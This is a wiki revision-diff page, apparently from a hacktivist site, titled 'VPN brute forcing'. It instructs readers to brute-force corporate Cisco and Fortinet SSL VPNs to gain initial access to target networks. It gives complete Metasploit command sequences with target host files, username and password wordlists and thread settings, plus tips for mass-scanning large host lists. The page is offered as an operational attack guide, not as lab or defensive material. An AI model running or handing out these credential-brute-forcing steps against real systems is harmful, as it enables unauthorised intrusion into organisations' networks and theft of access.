VPN brute forcing: Difference between revisions
Jump to navigation
Jump to search
mNo edit summary |
mNo edit summary |
||
Line 1: | Line 1: | ||
Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. | [https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host files. | ||
You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with. | |||
== CISCO == | == CISCO == | ||
<pre> | <pre> | ||
Line 28: | Line 29: | ||
run | run | ||
</pre> | </pre> | ||
Revision as of 18:09, 31 August 2023
Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass scanning ports. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host files.
You can use Seclists for common usernames and passwords to brute-force with.
CISCO
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/cisco_ssl_vpn set RHOSTS file:/home/targets_443.txt set RPORT 443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run
FORTI SSL VPN
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/fortinet_ssl_vpn set RHOSTS file:/home/targets_10443.txt set RPORT 10443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run